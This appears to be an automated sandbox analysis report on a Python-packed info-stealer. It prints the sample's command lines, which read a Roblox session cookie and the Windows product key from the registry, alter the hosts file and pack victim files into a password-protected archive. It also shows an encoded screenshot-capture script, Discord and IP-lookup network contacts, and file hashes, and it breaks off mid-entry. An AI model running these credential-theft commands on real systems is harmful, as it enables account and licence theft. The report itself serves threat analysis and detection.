DQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e1peedbv\e1peedbv.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86C4.tmp" "c:\Users\Admin\AppData\Local\Temp\e1peedbv\CSC658B46EF2265495EA095467527C7E5E2.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\vVa0s.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI25922\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI25922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\vVa0s.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-lgtb7.in | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 142.250.180.3:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI25922\python312.dll
| MD5 | cbd02b4c0cf69e5609c77dfd13fba7c4 |
| SHA1 | a3c8f6bfd7ffe0783157e41538b3955519f1e695 |
| SHA256 | ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5 |
| SHA512 | a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567 |
memory/4392-24-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI25922\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\base_library.zip
| MD5 | 630153ac2b37b16b8c5b0dbb69a3b9d6 |
| SHA1 | f901cd701fe081489b45d18157b4a15c83943d9d |
| SHA256 | ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2 |
| SHA512 | 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_ctypes.pyd
| MD5 | e7629e12d646da3be8d60464ad457cef |
| SHA1 | 17cf7dacb460183c19198d9bb165af620291bf08 |
| SHA256 | eb8affa4e7a4da15c9cda37c68ac8232d885a9d367b28973473949b205384789 |
| SHA512 | 974ae1607093161a5f33eda9e0a0ade214700d05eb728c8157e7b7589c587cc1cdefe0132d16d31c2941ed4eec4668428564609a0a2ced983c8b13f98a84801b |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
memory/4392-30-0x00007FFADB510000-0x00007FFADB535000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_ssl.pyd
| MD5 | a9f1bda7447ab9d69df7391d10290240 |
| SHA1 | 62a3beb8afc6426f84e737162b3ec3814648fe9f |
| SHA256 | 2bb05f7dbd21e67d2a6671411f8ae503dd7538a6767b2169b3033b695557ac13 |
| SHA512 | 539e94b59093dcf62d6f1a312d9b6aac27873f6416cde050e756e367b9907a8c0e7a31109a433b206bf023436d823d3d945f695cc7291604c0a24bcd27dc1451 |
memory/4392-48-0x00007FFAE2D40000-0x00007FFAE2D4F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_sqlite3.pyd
| MD5 | b8aa2de7df9ba5eab6609dcf07829aa6 |
| SHA1 | 4b8420c44784745b1e2d2a25bd4174fc3da4c881 |
| SHA256 | 644669d0875b33aa7e9d3f1856bc8b696f796ad61c7edb9219f8f0ff1a69531a |
| SHA512 | 5587efef4c349a137d785594bb7cbffef19fd418bf7d6fb2a4a3e2107354f5f874eeb7e18799031bde335bc65e4ca53f73793a60c67a5482c7e6d1564894ba17 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_socket.pyd
| MD5 | 4ee9483c490fa48ee9a09debe0dd7649 |
| SHA1 | f9ba6501c7b635f998949cf3568faf4591f21edd |
| SHA256 | 9c644a6db56052cf2680476648391b47b603957ffb353ad44a68dac761805ef1 |
| SHA512 | c55ddd782cc52d1aba6fd4466ed72387aad4debd3c48315db16aa35d3a5265478d8b197a3a0e0bcf9277004c10b4ccfe8706ab9d0e886d19c0cc4cb406fab4a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_queue.pyd
| MD5 | 048e8e18d1ae823e666c501c8a8ad1dd |
| SHA1 | 63b1513a9f4dfd5b23ec8466d85ef44bfb4a7157 |
| SHA256 | 7285eef53fd485d6093a9aecbe8fc87c6d70ae4e91d41f382a2a3edff7ebc6c8 |
| SHA512 | e57e162d1099b696d11bad172d36824a41fde3dd1d3be0dbd239746f8c87f17e78f889c8ad75ffdac89032b258e6f55f0dab82aae21b9d7ad166ceedfe131b61 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_lzma.pyd
| MD5 | ed348285c1ad1db0effd915c0cb087c3 |
| SHA1 | b5b8446d2e079d451c2de793c0f437d23f584f7b |
| SHA256 | fa84770ccf4394d046ed69edaea71957306a25def4986ee6650daf0a2c2d3e43 |
| SHA512 | 28a4c21bdb0bd697e93b276c184bfc5e317d930c4462e655d9d9ef7487168809ee952e32a856304cdd67a76d6b2286bf94fe9b9de6706c8d36a810aa916ce8e1 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_hashlib.pyd
| MD5 | 3c1056edef1c509136160d69d94c4b28 |
| SHA1 | e944653161631647a301b3bddc08f8a13a4bf23e |
| SHA256 | 41e4bb3c6064cb9e8a62e17056aea19e3d7e6ff1efc17c18d76118ac4e3b7243 |
| SHA512 | a03fcf2af6df72923714f66d26774a39e709fa8ad879d72b838d531692231f68480b5ff65b83358ad6b7b411f4ece7028a8613c3b1177acf1d3c933a843ca19a |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_decimal.pyd
| MD5 | 94fbb133e2b93ea55205ecbd83fcae39 |
| SHA1 | 788a71fa29e10fc9ea771c319f62f9f0429d8550 |
| SHA256 | f8e8fbeee7c8454fa42fe47f1da9c63f6b6e631b0dff22c80631f426efcba78b |
| SHA512 | b488f06be28fc8ffd3d8be6b986c7a35ab868198b10943bfa59b9130ebd50354adb9e1818b73ed1f2c92d33d869091e9167346b4430668ca31dd46a845276dea |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\_bz2.pyd
| MD5 | ba8871f10f67817358fe84f44b986801 |
| SHA1 | d57a3a841415969051826e8dcd077754fd7caea0 |
| SHA256 | 9d30387ee07585516f8ce479fcd4e052597835d4149568c1d8382a4a3a0ae7e1 |
| SHA512 | 8e23b032b785f37b920206fa3064c5fa0e28949f23b2e985fae26c9a355a6bc33dcd380925091f627d4d7936f0958e90fa7c022d89c73db8a1ea6ad267a1a341 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\unicodedata.pyd
| MD5 | 9a03b477b937d8258ef335c9d0b3d4fa |
| SHA1 | 5f12a8a9902ea1dc9bbb36c88db27162aa4901a5 |
| SHA256 | 4d6e035a366c6f74660f74b8b816add345fa7f1c6cf0793dcf1ed9f91b6ce6a4 |
| SHA512 | d3d8bb51474f93d02837580f53aacf5ca9eaf8587e83cddb742c707a251fe86f14e8e665aa4423ac99d74c6c94d95c7df3bfd513b3d5c69661e604f22dcabebe |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\sqlite3.dll
| MD5 | ce4f27e09044ec688edeaf5cb9a3e745 |
| SHA1 | b184178e8a8af7ac1cd735b8e4b8f45e74791ac9 |
| SHA256 | f940ff66960441c76a258846d66d4a357e72ad8fbb6bde62b5e5fbe90103b92d |
| SHA512 | bab572324dcf12e71fb6a9648e9224528bd29c75e7d3b978b7068eca0d6f2cb795165756249f47e1db401267b0a1e5fd06c35b6cf5595a013240f9e3444ea083 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\select.pyd
| MD5 | a71d12c3294b13688f4c2b4d0556abb8 |
| SHA1 | 13a6b7f99495a4c8477aea5aecc183d18b78e2d4 |
| SHA256 | 0f3ae1b65102d38f6b33fcbbdadd347aa1b0c09ed8028d4412982b3bd97caf0f |
| SHA512 | ff16cb399b661c170bf79108c62010d32804ead3f6c565b0755a26b62b4f51290bcb71face6cebaa82c0f9b3863aaaa7fa57ddc1e2bbae8598b047d01d15cbe5 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\rarreg.key
| MD5 | 9795f79ddb61aa29027f4d68496b379c |
| SHA1 | 2b28db4d9ac8cffba73048444b1df25346f4ef32 |
| SHA256 | e63f3d6710097498085564dfc85add6ed4cf44238c33d20820d2426abcee4e31 |
| SHA512 | e44fbbc02da75d173c81bdfda9b14102997609af06fd50c51030430c3c80193dadb632592997361c79b0dfed50ccc0e1743c306a881401a1c78a6a7facb45d4d |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI25922\blank.aes
| MD5 | 5a3735ca91c1c8c1a06e93f279fada39 |
| SHA1 | 0da37688e04f6540fa1370eb90c3b22dd6866433 |
| SHA256 | 3c5cff8ff19d7dad79b8cc0d6462f890b5659267377f603585e05d2c539a7f2c |
| SHA512 | 6008d317557bd51d38a02b3b343a34e375727d83fce897b7aa765fc4c3142efce1a4d4777801a49d34701467dcfaeb2d0abbb712dc4c1addae4f3f0e10f8e2dc |
memory/4392-54-0x00007FFADB460000-0x00007FFADB48D000-memory.dmp
memory/4392-57-0x00007FFADB440000-0x00007FFADB459000-memory.dmp
memory/4392-58-0x00007FFADB350000-0x00007FFADB374000-memory.dmp
memory/4392-60-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp
memory/4392-62-0x00007FFADB420000-0x00007FFADB439000-memory.dmp
memory/4392-64-0x00007FFAE0800000-0x00007FFAE080D000-memory.dmp
memory/4392-68-0x00007FFADA310000-0x00007FFADA3DD000-memory.dmp
memory/4392-67-0x00007FFADA3E0000-0x00007FFADA413000-memory.dmp
memory/4392-72-0x00007FFAC8B20000-0x00007FFAC9049000-memory.dmp
memory/4392-71-0x00007FFAC9050000-0x00007FFAC9729000-memory.dmp
memory/4392-73-0x000002507A7C0000-0x000002507ACE9000-memory.dmp
memory/4392-75-0x00007FFADB510000-0x00007FFADB535000-memory.dmp
memory/4392-78-0x00007FFAE06B0000-0x00007FFAE06BD000-memory.dmp
memory/4392-80-0x00007FFAD5D20000-0x00007FFAD5E96000-memory.dmp
memory/4392-81-0x00007FFAC8A00000-0x00007FFAC8B1B000-memory.dmp
memory/4392-77-0x00007FFADA6C0000-0x00007FFADA6D4000-memory.dmp
memory/4156-82-0x000001EF72ED0000-0x000001EF72EF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5llo0sk.lmy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
memory/4392-207-0x00007FFADB350000-0x00007FFADB374000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | f99e42cdd8b2f9f1a3c062fe9cf6e131 |
| SHA1 | e32bdcab8da0e3cdafb6e3876763cee002ab7307 |
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
| SHA512 | c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6 |
\??\c:\Users\Admin\AppData\Local\Temp\e1peedbv\e1peedbv.cmdline
| MD5 | 116c08a2e745d37785bfc01af056791c |
| SHA1 | ff92348bbaf7a8e7c09ffe74a7fa8442775e41bf |
| SHA256 | ec406a78d60f4d7d1c6a2361ccd544edc8cecf87c64623763e7569a60c2a285b |
| SHA512 | 2168de28c59d7339a6d57bb11fb4127e493d4de48f375252c8e75e80c297597c86ad03362ffe069cf7f14a3f107c63555e5671d29bea586313a626a595ef3a7c |
\??\c:\Users\Admin\AppData\Local\Temp\e1peedbv\e1peedbv.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\e1peedbv\CSC658B46EF2265495EA095467527C7E5E2.TMP
| MD5 | f9c003212ea92f5b18685f8360e0786b |
| SHA1 | 3611d2ef1a97095eda07a0eb801450ce2affa232 |
| SHA256 | 2e73f59cc74a700477742d603d06c0780bb5d95f580f1396dfeec1d622a7980c |
| SHA512 | eb20d9e4096da7852f5052e48e9b8b12eba5da0611410e42645faf9d88a704868bc9cff1e5bf93c494832662a1d6627a4e166f94905718f414be7e1c66f71fc0 |
C:\Users\Admin\AppData\Local\Temp\RES86C4.tmp
| MD5 | 5b29020c94bd839a6dd8d4c70955748b |
| SHA1 | c3df2698ad551e820301b1202a4b1280596ba08a |
| SHA256 | 711cdf1925f6622564e35fdefcfe9a019816c21f74aab9a98ad79f3f0baf5baf |
| SHA512 | 182a9969c36d19b5170972a0ced70f42f454475d4c5373ed1167cc3939a13c701a459cc50473a5ba3be541eb9e31698bf428f514767d18ba3ba8878b7a11dbb6 |
C:\Users\Admin\AppData\Local\Temp\e1peedbv\e1peedbv.dll
| MD5 | 9981ca9918eda6b0f4233f2f6bed2c38 |
| SHA1 | d9d029e6dd006507bdf5b776dda7f36295260845 |
| SHA256 | a1d0c2fc6ec6fd03eca15618289dbf1d9b7495f2a44f0773ebb197a82e3debb3 |
| SHA512 | bf50e47a8e9d99ebe9da751eb803959f733baba11078a940c2cdd222f1d4debaa15b376767af3e69324b9f1a4215eb9a75586635bf49241d26240e0a96ef0031 |
memory/1980-223-0x000001A8A9D90000-0x000001A8A9D98000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8167d3a6d9f90e5565bbfb689436a2df |
| SHA1 | 504e61b40a9baa5a530ef7875cafe3c9357e9ef0 |
| SHA256 | 45640d678756b10ab50b8b2c5170ac76fef2c5d32675f26b8d69abfd7d760e95 |
| SHA512 | f0ebe89948cea5c113120229a1458bd3b831b962777a5e1ea7cd75f248c33bf0515e67ca995e28a929c6c977e2d76f51293fd8d59564cccef5c6261bc19e9881 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7332074ae2b01262736b6fbd9e100dac |
| SHA1 | 22f992165065107cc9417fa4117240d84414a13c |
| SHA256 | baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa |
| SHA512 | 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ResumeMount.doc
| MD5 | 07a0e93ccc9d1d2c5f9577d2804d7882 |
| SHA1 | e7b55b58a1b5bd224da9fde2cf23a32944f1df33 |
| SHA256 | 9549c367a2223c89ebd750e59274dcd3fe01e5b0d5aeb69d5ff55aa751113673 |
| SHA512 | 2c9d2cef1406d9b9a43f82ff7d6af9399a7524f2d0f839d167ab2c795c8b66f52698034953f2eba0a8b2e805e06367a1d18f27e9978a7b09ed0b171419382872 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\RevokeSubmit.txt
| MD5 | b92b212cc4bc7795c9f0696d0a33cb0c |
| SHA1 | c47c72c378042cd1369a761e63bf43fdf821be80 |
| SHA256 | 6aaf20c7d6bc52210a491c3fb82b6e9675dd33a57f1aa43637724b9d7fbc8b8c |
| SHA512 | af2f40eff8f376676dd4f229e8dedd863bf7f8e40e031dd2cc1f23c23e867fdd6d50ea268e4c9981411f691868458a13c1d64d803dcb881d8fe016ba5bb2a9cf |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\AddRead.pdf
| MD5 | 74d8b4373eea4b03101a5fce49819837 |
| SHA1 | ef191e7f4b424c52701771428772e3509a75d2ea |
| SHA256 | dfaa35827f3f8f5508c21efe9b4906f2653838260601d3a2aff2d44846e20355 |
